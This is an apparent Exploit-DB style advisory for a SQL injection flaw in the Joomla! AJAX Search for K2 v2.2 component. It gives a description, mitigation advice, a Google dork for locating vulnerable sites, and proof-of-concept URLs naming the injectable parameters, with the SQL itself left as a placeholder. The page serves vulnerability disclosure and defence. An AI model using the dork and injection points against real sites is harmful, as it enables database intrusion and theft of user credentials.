Joomla! Component AJAX Search for K2 v2.2 - SQL Injection

vendor:

AJAX Search for K2

by:

Ihsan Sencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: AJAX Search for K2

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Joomla! Component AJAX Search for K2 v2.2 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component AJAX Search for K2 v2.2. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials, or to modify or delete data.

Mitigation:

Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This will ensure that user-supplied input is treated as a string value rather than as executable code.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2ajaxsearch
# Date: 24.02.2017
# Vendor Homepage: http://taleia.software/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
# Demo: http://k2ajaxsearch.taleia.software/demo/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
# # # # #